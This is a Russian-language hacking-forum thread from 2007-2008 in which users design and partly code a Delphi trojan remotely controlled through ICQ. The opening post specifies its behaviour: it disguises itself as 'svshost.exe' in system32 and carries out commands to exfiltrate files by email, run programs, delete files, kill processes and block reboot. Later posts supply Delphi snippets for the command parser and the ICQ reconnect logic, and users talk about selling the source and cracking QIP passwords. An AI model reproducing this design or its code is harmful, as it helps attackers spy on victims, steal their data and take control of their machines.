Просмотр полной версии : Пишем троя на icq
xaker-boss
09.06.2007, 14:50
Люди мош кто папробует написать троя? на Delphi?
есть хорошая идейка по этаму поваду:
Когда запускаеш этот вирус он просто переносится в папку C:\WINDOWS\system32 и имеет название svshost.exe так будет трудней его удалить.
Сам вирус я придлогаю написать на TICQCLient, чтобы управлять им через асю.
Функций для него конечно можно придумать много,но тем немения: вот мой списочек:
-------------------------------------------------------
RESTART_KAS
Функция перезагружает комьютер клиента без каких либо предупреждений.
STOPCMP_KAS
Функция подвесит компьютер клиента, сильно зависит от версии виндовса.
DESKTOP_HID
Функция скрывает рабочий стол клиента (его значки).
DESKTOP_SHW
Функция показывает рабочий стол клиента.
TRAY_HID
Функция скрывает системный трей (там где часы и значки программ)
TRAY_SHW
Функция показывает системный трей (там где часы и значки программ)
CDAUDIODOOR_OPEN
Функция откроет поддон CD-ROM клиента
CDAUDIODOOR_CLOSE
Функция закроет поддон CD-ROM клиента
TRAYWND_QUIT
Скрывает оболочку Explorer. Такое ощущение как будто выгрузили Explorer. Если пробовать запустить Explorer, то он не запускается.
TROY_QUIT_KASDIMA
Вырубает программу на текущую сессию виндовса. При перезагрузке программа запустится вновь.
WIND_NOTRESET
Блокирование перезагрузки, выхода из системы
WIND_YESRESET
Отменяет блокирование перезагрузки, выхода из системы
UNREGISRY_KASDIMA
по сути удаляет программу из системы (удаляет из автозагрузки)
Функции с параметрами
################################################## #####
MSG_ваше сообщение
Функция выведет любое сообщение от имени системы
Пример использования: MSG_Привет флудерам!. KAS!
Будет выведенно сообщение: Привет флудерам!. KAS!
GETIPUIN_ваш уин
Получение IP адреса. IP адрес придет в ответе.
Пример использования: GETIPUIN_333999666
IP адрес прийдет на номер 333999666
GETLISTPROC_ваш уин
Функция возвратит список процессов у клиента на компьютере.
Пример использования: GETLISTPROC_333999666
Список процессов прийдет на номер 333999666
OTDIR_KAS_ваш уин;Папка
Функция возвращает список файлов и папок в указанной папке
Пример использования: OTDIR_KAS_333999666;C:\
Список файлов и папок находящихся в C:\ прийдет на номер 333999666
SNDEMAIL_ящик пользователя;Файл
Функция пришлет на ящик пользователя письмо с указанным файлом
Пример использования: SNDEMAIL_motorola3653@mail.ru;C:\1.txt
Пришлет письмо на AlLex@mail.ru с файлом C:\1.txt
WINEXEC_программа
Выполнит любую программу с жесткого диска клиента.
Пример использования: WINEXEC_С:\miranda.exe
выполнит С:\miranda.exe на машине клиента
OTDIR_KAS_ваш номер;папка
Возвращает все папки и файлы в указанной папке
Пример использования: OTDIR_KAS_333999666;С:\
Возвратит на номерок 333999666 содержимое С:\
SHL_
Общее: SHL_Operation;Fname;Parametr;Directory;IntShow
Выполнит любое действие предусмотренное проводником виндовс
Расшифровка команд:
Operation - операция
Fname - полное имя файла
Parametr - параметр для открытия
Directory - папка где находится файл
IntShow - параметр видимости 5-отображать
Пример использования: SHL_open;C:\1.txt; ;C:\;5
Откроет файл C:\1.txt в блокноте
KILLTASK_
Убьет любой процесс в системе клиента
Пример использования: KILLTASK_notepad.exe
Убьет процесс notepad.exe
DELETEFILE_
Удалит любой файл с жесткого диска клиента
Пример использования: DELETEFILE_С:\1.txt
Удалит файл С:\1.txt
---------------------
Каждое сообщение которое не содержит признаки команды не будет никак воздействовать.
Мош всёже папробуем? насчёт этих функций я могу памоч немношко.Хорошо былобы иметь такой вирус...
--------------------
А также у меня появилась новая идейка, для того чтобы вирус весил меньше можно сделать его не через ICQ а через IRC, просто чтобы он заходил в комнату а ты ему туда команды посылаеш и всё.
Так даже можно каждуму из них задать имя и тогда им можно пользоватся неодним челом а нескольким.
http://forum.antichat.ru/thread40531.html
Примерно 0.5 от твоих функций. Правда на С++.
оригинально+
...недана будет ip вычислять и т п...
С использованием TICQClient'а размер exe будет немаленьким!
Чювак хорошо придумал, я за! вирус этот будет весить примерно 500 КБ но нечё страшного и такой сайдёт.оригинально+
...недана будет ip вычислять и т п...
это реально, вот автор темы же написал что паможет с функциями. Ну так чё есть претенденты которые попробуют написать???
Check dis:
ICQ-клиент, написаный на FASM: _http://wasm.ru/src/5/faim.zip
Check dis:
ICQ-клиент, написаный на FASM: _http://wasm.ru/src/5/faim.zip
извращенцы =\
Piflit почему? =) на основе этого сурса что угодно можно сделать! =\
Piflit почему? =) на основе этого сурса что угодно можно сделать! =\
думаю, ты сам понимаешь, почему =)
ЗЫ у меня не пашет, пишет, что логин и пасс неверные
Sorry! :(
Вот офф. страничка: _http://roticv.rantx.com/faim/
А вот реально работающая версия + сурс: _http://roticv.rantx.com/faim/faim021src.zip
NetMan ты прав... мош хватет опсуждать?мош всё же ктонебуть попробует написать и даст точный ответ палучится сделать или нет?
Есть уже подобная вещь. функций поменьше но смысл тот же. Delphi.
342кб=( написан был в марте
715868 им. Кому интересно могут стукнуть и купить исходники. 5 у.е. вроде стоил=\
В майском номере журнала "Нахер" (он же Хакер) рассказывалось о написании примерно такой же тулзы тоже на Делфи кстати, могете взять за основу. Статья называлась "Ваяем Radmin".
xaker-boss
11.06.2007, 13:37
Люди ну так что, кто возьмётся делать этот трой?))
Достаньте статью с НАХЕРА =)
Какой номер джурнала?
Парни, я что-то не совсем врубаюсь, это получается у каждого такого троя будет свой уин или у всех одинаковый, если одинаковый то они одновременно не зайдут все, а если у каждого разный, то это геморно... Объясните пожалуйста!
xaker-boss
13.06.2007, 14:52
[krot] нет у каждого трояна будет свой иун, можно сказать у каждой жертве...ну а как ты будеш узнавать какой вирус у кого запущен??? это самый рптимальный вориант.
motorola3653
Так это же геморно получится, а если ты решил разослать 100 или 300 троев или вообще 1000 этож заипешься уины с пассами доставать, ИМХО
А если несколько человек скачали один и тот же трой с одинаковым уином, так это они все будут рватся в сеть под одним уином, муть какая-то получается...
Или вы имеете ввиду что трой будет типа радмина, что жертв будет немного в пределах нескольеих штук?
Я не понимаю, объясните, плиз!
xaker-boss
13.06.2007, 21:50
[krot] ты дурак или прикидываешься?
1.Его незя запустить дважды на одном компе, он просто старый заменит и всё.
2.Сделаем прогу чтобы быстро и бес проблем менять в этом трое (uin и пасс).
Каму это надо рассылать 100 троев? на даже если и надо то придётся им найти 100 уинов....
xaker-boss
13.06.2007, 21:53
ICQ Pro трой делать уже взялся n3m0 . Хотелось бы ещё притиндентов.
Хотелось бы ещё притиндентов.
Если найду такой же компонент для Си (неохота на дельфях сидеть), напишу свой вариант...
edit:Оказалось ,borland компонент для делфи спокойно устанавливается под Си... )
[krot] ты дурак или прикидываешься?
2 motorola3653 за языком следи!Понял?!
А если несколько человек скачали один и тот же трой с одинаковым уином, так это они все будут рватся в сеть под одним уином, муть какая-то получается...
А ты мне отвечаешь:
1.Его незя запустить дважды на одном компе, он просто старый заменит и всё.
Тут идет речь про разные компы! Может глазные капли поищешь для себя???
Каму это надо рассылать 100 троев?
К примеру, пинч и в больших объемах "рассылают" или ты скажешь, что пинч это не трой???!!! :D
n3m0
Спасибо за ответ, приятно иметь дело с культурным человеком :)
Скажи, а статистику делать будешь через пхп форму или просто трой будет запрашивать авторизацию у "хозяина" и данные об IP, OS и т.п. можно будет получить только с помощью команд, непосредственно обращаясь к каждому трояну?
Спасибо.
Хотелось бы узнать размер Exe...
n3m0 > TICQClient юзаешь? :) :)
Попрошайка
14.06.2007, 18:46
Народ, а кто нибудь сталкивался с проблемой подключения к серверу ICQ при использовании
компонент от Кабана, а именно в проекте без форм?
TICQClient v.1.21 (пропатченная), Delphi 7
Тоесть даже если :
project SuperICQ;
uses windows, ICQClient,...;
var
begin
try
ICQ.UIN := 123123;
ICQ.PassWord := 'superpass';
ICQ.Login;
finally
....
ICQ.Free;
end;
end.
Причём именно в таком раскладе, если тоже самое перенести в проект где присутствуют формы, то всё нормально.
P.S. В некоторых модулях TICQClient были строчки
с директивами в которых автор давал рекомендацию
для их удаления, если компонент используется в проекте без форм, но толку это не дало. Пробовал вообще избавиться от класса TComponent из TICQClient, что бы привести всё к виду : ICQ := TICQClient.Create; вместо Create(nil). Но ничего не дало... в Королевстве Дельфи находил похожую проблему, но рецепта на излечения не нашёл :(
И на одном из сайтов нашёл похожую проблему, где парень писал плагин к Download Master, там давали совет включить строчку в проект Applicatio.CreateHandle; но в моём проекте вообще нет модуля Forms, .... вообщем уже 2 недели копаюсь... помогите пожалуйста!!!! SOS!!!
n3m0 > Имхо, не получиться сделать прогу маленькой, юзая TICQClient! Надо искать другой путь, например, самому реализовать. :)
а кто-нибуть знает, как в TICQclient указать local порт? (всмысле я хочу юзать несколько компонентов сразу(под несколько uin'ов), а один перекрывает другой)
на делфях не знаю как но думаю паскаль и делфи похожи
читаем строчку-исходная
цикл который переберает попорядку эту строчку и записывает в строку-1
как только доходим до спец символа который разделяет уин и пас выходим из цикла
и у нас есть переменная уин
слудующий цикл начинаеться с того места где закончил первый только на шаг в перед и читаешь до конца строку в цикле вот и все!
потом поделишься троем??:)
если время свободное есть разберусь и на делфях накатаю
Что то типа такого -
procedure TForm1.Button1Click(Sender: TObject);
var ER:tstrings;
i,k: integer;
q: boolean;
l,m,n: string;
begin
er:=TStringList.Create;
er.LoadFromFile('1.txt');
for i:=0 to er.Count - 1 do
begin
l:= er.Strings[i];
m:=''; n:='';
k:=1;
q:= false;
while k <= length(l) do
begin
if (l[k] = ';')
then begin
while k<= length(l) do
begin
inc(k);
n:= n + l[k];
end;
q:= true;
end
else begin
if q = true then exit;
m:= m + l[k];
inc(k);
end
end;
memo1.Lines.Add(m+' '+n);
end;
er.Free;
end;
Попрошайка
22.06.2007, 11:44
Спасибо, на вид вроде рабочий. Днём проверю
Имхо, проще так :
procedure TForm1.Button1Click(Sender: TObject);
var
F : TextFile;
S : string;
UIN, PassWord : string;
begin
AssignFile (F, 'C:\1.txt');
{$I-}
Reset (F);
{$I+}
if IOresult = 0 then
begin
while not SeekEof (F) do
begin
ReadLn (F, S);
UIN := Trim (Copy (S, 1, Pos (';', S)-1));
PassWord := Trim (Copy (S, Pos (';', S)+1, Length (S)));
Memo1.Lines.Add (UIN+' - '+PassWord);
end;
CloseFile (F);
end;
end;
второй вариант имхо лучше! когда релиз троя?
xaker-boss
11.07.2007, 00:25
Люди ну у кого есть время хотябы попробуйте написать токого троя.Плиз
Попрошайка
11.07.2007, 16:10
Люди ну у кого есть время хотябы попробуйте написать токого троя.Плиз
Да дело не во времени, по крайней мере у меня. Нужен алгоритм расшифровки паролей QIP поздних версий. Вот если кто-нибудь поделился бы им, тогда
о чём то можно было говорить. Да и исходник троя уже как то пролетал в одном из топиков.
NiGHt-LEshiY
12.07.2007, 20:46
qip собрался ломать? шалун...имхо, если и найдешь алгоритм расшифровки, поиск будет долгий...мало кто халявно тебе отвалит..
Попрошайка
12.07.2007, 22:31
qip собрался ломать? шалун...имхо, если и найдешь алгоритм расшифровки, поиск будет долгий...мало кто халявно тебе отвалит..
А кто тебе сказал, что я собрался это делать? Человек
просил готовое решение, ему ответили ;)
xaker-boss
15.07.2007, 21:30
Metal пресоединяюсь.
Что с троем?
heh , я скачал TICQClient , а он сам с троем оказался :D
а вам не проще на сервере хранить файлик с пасами:уинами запрашивать его через пхп скрипт который каждый раз при выполнений удалял бы и зфайла 1 пару и выводил бы ее на страницу потом парсить эту страницу и и скать эту пару лучше делайте это через сокеты трой лопнет от еще одного компонента.
Компоненты это херня полная ) идея самая backdoor - писать на icq протоколе это тупо
1 Есть такая штука как IRC
2 Зачем делать то что сделали (я имею ввиду что идея та же самая что IRC ботов ) к тому же нада придумать реестрацию самого бекдора (получения логина и пароля )
3 Тут надо поставить вопрос еще что делать с нашимы видами защиты к примеру фаеры KIS и тому подобноя херня ) ведь обходить их слижновато (нада скакать с User moda в ring0 или Shadow System Service Table ) про это надо еще подумать а сам бекдор или тот самый Shell (I/O Thread ) скрытую консоль можно сделать за пару дней Писать надо без всяких там компонентов. С++ или масм или делфи это не имеет значения
1 Есть такая штука как IRC
надо же кокой гений , а почему тя еще в Micrisoft работать не взяли?
Сама идея реслизации анонимной авторизации трояна в сети через icq - оригинальна , если не гениальна...
Здесь не говорилось про облод фаерволов ... см др топик...
Предположим есть удаленный комп c динамическим ip (dialup/vpn) а тебе нада к нему регулярно коннектица , еще и анонимно...
Поднимать на нем irc сервер - идиотизм , а заставлять его заходить в какой либо канал - безрассудство (ибо палишь и себя и канал)...
А Icq обоспечивает как удобство (вместо ip юзаешь уин) , так и анонимность (что мешает те заюзать левый уин + прокси (как в qip,miranda) ) при этом еще и в качестве дополнительного прокси выступит сам сервер icq ...
А успешность, универсальность ,скрытность проэкта зависит уже от мастерства кодеров...
Кстати автору топика респект , а програмистам - совет : Сделайте настройщик трояна (с указанием уина и т п) , например в трояне фиксированый ini как resource... и настройщик , редактирующий его, как ресурс...
--> Jes "Поднимать на нем irc сервер - идиотизм , а заставлять его заходить в какой либо канал - безрассудство (ибо палишь и себя и канал)..."
Так скажи же мне почему первое место по популярности занимает Agobot, насчитывающий свыше пятисот своих модификаций ? а про icq так глухо ???
потомучто до вас такие гении как вы уже пытались это сделать но широкого роспространения не вышло!! (сказано не обиду ) Говорю про то что не надо делать то что делали ) Я понию что было круто управлять ботом по icq (даже с того самого моб. телл ) но есть но ...
Так скажи же мне почему первое место по популярности занимает Agobot, насчитывающий свыше пятисот своих модификаций ? а про icq так глухо ???
ни разу не видел троя с использованием irc ...
ps: а как ты будешь узнавать динамический ip жертвы каждый раз?
pps: буть у меня винда , ticq клиент для С++ и желание, я б за неделю написал...
C!klodoL
21.07.2007, 15:51
протокол ойсикью слишком абузный для этого, могут не дать подключиться из за слишком частых подключений и так далее, не лучше ли использовать джабер или мэйл агент, работа с протоколом джабера проще ойсикью, + трой сам сможет регацо на сервере так как картинки там нет
to --> Jes "ни разу не видел троя с использованием irc ...
ps: а как ты будешь узнавать динамический ip жертвы каждый раз?" по функцыональности любой бот это и есть почти тот самый бекдор ) А зачем тебе IP ?? у тебя твой бекдор попадает на какую нить жертву вот после чего делает реверз коннект на сервак irc после чего висит на канале ) и все ) просто нада еще иметь опыт в irc
Поднимать на нем irc сервер - идиотизм , а заставлять его заходить в какой либо канал - безрассудство (ибо палишь и себя и канал)...
что за бред? зачем поднимать irc сервер? дело ограничивается ботом, который заходит на канал и получает команды. посмотри исходники irc ботов.
ИМХО использовать icq гораздо удобнее но это накладывает свои расходы к примеру тут аж целый компонент придется ссобой таскать а значит и всех его предков(предка). в случае irc, зачем поднимать целый сервер нужен лишь канал с паролем и бот который там будет крутится постоянно и команду опознавания хозяина
ИМХО использовать icq гораздо удобнее но это накладывает свои расходы к примеру тут аж целый компонент придется ссобой таскать а значит и всех его предков(предка).
а про другие реализации icq протокола ты конечно не слышал?
а про другие реализации icq протокола ты конечно не слышал?
не понял вопроса... реализовать можно хоть вручную что кстати будет более полезно в общеобразовательных целях но видимо этот вариант никого не устраивает из авторов а других целей я тут не вижу, врядли получится как говорится коммерческий проект
[SmItHrIx]
22.07.2007, 01:14
n3m0 если исходники будут в привате то стукнись в асю 6660135 или личку, помогу со скрытием в системе и паролями от qip =)
ЗЫ я люблю коммерческие проекты
xaker-boss
14.11.2007, 22:20
неужели проект заброшен?
А также у меня появилась новая идейка, для того чтобы вирус весил меньше можно сделать его не через ICQ а через IRC, просто чтобы он заходил в комнату а ты ему туда команды посылаеш и всё.
Так даже можно каждуму из них задать имя и тогда им можно пользоватся неодним челом а нескольким. :) :)
неужели проект заброшен?
Так даже можно каждуму из них задать имя и тогда им можно пользоватся неодним челом а нескольким. :) :)
это называется (ддос)бот
xaker-boss
23.11.2007, 18:48
Сам вирус из первого поста готов, сделал его один типчик, так давать нехочет но прадаёт исходник за 500р.... antichaty скидка
De-visible
25.03.2008, 02:00
Дайте кто нить исходник этого проекта??
оказывается вирусы кодят на VCL и складывают в папку Windows, чтоб не заметно было ))))) весело фигле )))
Так же интересуюсь исходником. Грамотный купил бы даже... ;)
Я сейчас заинтересовался этой темой и у меня вопрос : как вы собрались реализовывать таймер поддержки подключения? Да , и не могли бы вы кинуть сорцы на данный момент?
De-visible
30.03.2008, 21:31
: как вы собрались реализовывать таймер поддержки подключения?
????
????
Ну как я понял чел имел в виду как мы будем делать таймер который будет конектитиь трой через интервалы времени к инету. ИМХО идиотский подход. Легче через сокет.
А как? Просто я делаю свой бот без формы фактически тот же трой , тока мирный и мне эта шня нужна.Как васобрались реализовывать?
xaker-boss
31.03.2008, 10:21
Исходники дать немогу, так как хозяин потом будет в бешенстве, но помочь могу:
Ну там на форме всего 3 таймера
procedure TForm1.IcqLogTimer(Sender: TObject);
begin
if icq1.LoggedIn=false then
//Если ася не подключена
GO; // Подключаемся
end;
procedure TForm1.ICQANSWTimer(Sender: TObject);
begin
ICQANSW.Enabled:=false; //
ICQ1.SendMessage(StrToInt(UINansw),strAnsw);
Application.ProcessMessages;
end;
Трой просто весит в процессах и ждёт пока компьютер зайдёт в инет, как только он зашёл в инет он заходит в ICQ и ждёт там ваших команд
Мне больше интересен кое реализации "понимания" комманд. Особенно тех что с параметром.
xaker-boss
31.03.2008, 10:53
1. Вот UIN вируса: 258-291-730 . Кто-то его запустил, иногда поевляется в сети.
2.OTDIR_KAS_ваш уин;Папка
Функция возвращает список файлов и папок в указанной папке
Пример использования: OTDIR_KAS_333999666;C:\
Список файлов и папок находящихся в C:\ прийдет на номер 333999666 ::::
if Copy(AnsiUpperCase(msg),1,10)='OTDIR_KAS_' then
begin
// OTDIR_KAS_OTDIR_KAS_333905248;C:\
mes:=msg;
delete(mes,1,10);
oper:= Copy(mes,1,Pos(';',mes)-1);
delete(mes,1,Pos(';',mes));
UINansw:= oper;
strAnsw:= GetDir(mes).Text;
ICQANSW.Enabled:=true;
Exit;
end;
xaker-boss тоесть ты хочешь сказать , что вы юзаете форму , но тогда проект до ху
весить будет.Да и ещё есть код подключения
program WinisqB;
uses Windows,SysUtils,Registry,ICQClient,ICQWorks;
var
begin
ICQ.UIN:=44028935;
ICQ.Password:='kd';
ICQ.ICQServer:='login.icq.com';
ICQ.ICQPort:=5190;
ICQ.Login();
icq.Status:=8;
end.
он просто не конектит и всё . Чё неправильно ?
xaker-boss
31.03.2008, 19:14
Manoff да мы юзаем форму, но она скрыта.
Код должен работать, НО у тебя неверный Password к UIN.
А ты думал , что я настоящий UIN c Pass'oм на форум кину :)?
De-visible
31.03.2008, 22:00
xaker-boss тоесть ты хочешь сказать , что вы юзаете форму , но тогда проект до ху
весить будет.Да и ещё есть код подключения
program WinisqB;
uses Windows,SysUtils,Registry,ICQClient,ICQWorks;
var
begin
ICQ.UIN:=44028935;
ICQ.Password:='kd';
ICQ.ICQServer:='login.icq.com';
ICQ.ICQPort:=5190;
ICQ.Login();
icq.Status:=8;
end.
он просто не конектит и всё . Чё неправильно ?
У меня все конектит, с чего ты вообще взял что он не логинится???
Люди мош кто папробует написать троя? на Delphi?
есть хорошая идейка по этаму поваду:
Когда запускаеш этот вирус он просто переносится в папку C:\WINDOWS\system32 и имеет название svshost.exe так будет трудней его удалить.
Сам вирус я придлогаю написать на TICQCLient, чтобы управлять им через асю.
Функций для него конечно можно придумать много,но тем немения: вот мой списочек:
конечно не в тему но... у меня вопрос, почему сам не напишеш ??
Разные функции здесь повыкладывал =)
xaker-boss
31.03.2008, 23:09
Ну если ты незаметил тема была создана 09.06.2007, 13:50 .Тогда я неумел программировать. А сейчас у меня уже есть этот вир с исходником, но так как писал его не я, а только дорабатывал его я неимею никакого право выкладавать сюда исходник бес разрешения того кто его написал.Ну если у кого есть вопросы про функции обращайтесь.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot